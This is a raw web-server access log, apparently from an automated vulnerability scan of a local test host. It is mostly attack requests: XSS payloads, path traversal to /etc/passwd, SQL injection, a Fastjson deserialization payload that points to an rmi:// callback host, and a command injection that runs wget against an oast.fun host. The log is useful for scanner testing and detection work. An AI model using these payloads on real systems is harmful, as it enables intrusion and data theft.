AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.pwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAXx7oiFgRFq4V3vBO6XoEZYz.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://ca285tosmpvbafqg07h0trutaftadpsad.oast.fun%22)%7D' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/ca285tosmpvbafqg07h0dgu7333nq6t6r.oast.fun/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"proId=1'&addToCart=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /action.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca285tosmpvbafqg07h0g1r5y5zshsat8.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendarix/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 